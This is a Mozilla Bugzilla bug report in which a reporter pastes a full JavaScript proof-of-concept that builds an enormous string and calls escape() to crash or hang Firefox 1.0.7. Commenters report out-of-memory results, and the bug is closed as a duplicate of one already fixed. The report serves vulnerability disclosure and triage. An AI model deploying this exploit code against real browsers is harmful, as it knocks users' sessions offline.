Closed
Bug 312102
Opened 19 years ago
Closed 19 years ago
Working Denial of service exploit crashes Firefox 1.07
Categories
(Core :: JavaScript Engine, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 303213
People
(Reporter: jp.senior, Unassigned)
References
()
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 See the following: http://www.triviasecurity.net/exploits/Mozilla_Firefox_%3C=_1.0.7_Integar_Overflow_Denial_of_Service_Exploit Contains the source: <html> Copyright Georgi Guninski <br> Cannot be used in vulnerability databases <br> Especially securityfocus/mitre/cve/cert <script> var s=String.fromCharCode(257); var ki=""; var me=""; for(i=0;i<1024;i++) {ki=ki+s;} for(i=0;i<1024;i++) {me=me+ki;} var ov=s; for(i=0;i<28;i++) ov += ov; for(i=0;i<88;i++) ov += me; alert("done generating"); var fuckbill=escape(ov); alert("done escape"); alert(fuckbill); </script> </html> Reproducible: Always Steps to Reproduce: Actual Results: Firefox immediately locked up
I had other people test this on various OS's. This is confirmed to work.
Comment 2•19 years ago
|
||
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20051010 Firefox/1.6a1 I don't see a crash or hang, but Firefox says "Out of memory" in the JavaScript console during the escape() step. I never ese the "done escape" message. I think "Out of memory" is bogus in this case, btw.
Comment 3•19 years ago
|
||
Same with Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050914 Firefox/1.0.7.
Updated•19 years ago
|
Comment 4•19 years ago
|
||
With Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051007 Firefox/1.6a1, I get "out of memory" before it even gets to the "done generating" message.
Comment 5•19 years ago
|
||
> I think "Out of memory" is bogus in this case, btw.
Never mind. After re-reading the script I see that it is generating a
ridiculously long string.
Assignee: nobody → general
Component: Security → JavaScript Engine
Product: Firefox → Core
QA Contact: firefox → general
Version: unspecified → 1.7 Branch
Comment 6•19 years ago
|
||
(In reply to comment #1) > I had other people test this on various OS's. This is confirmed to work. Define "work" -- we think we fixed this in 1.0.7 see bug 303213 and bug 305190 *** This bug has been marked as a duplicate of 303213 ***
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•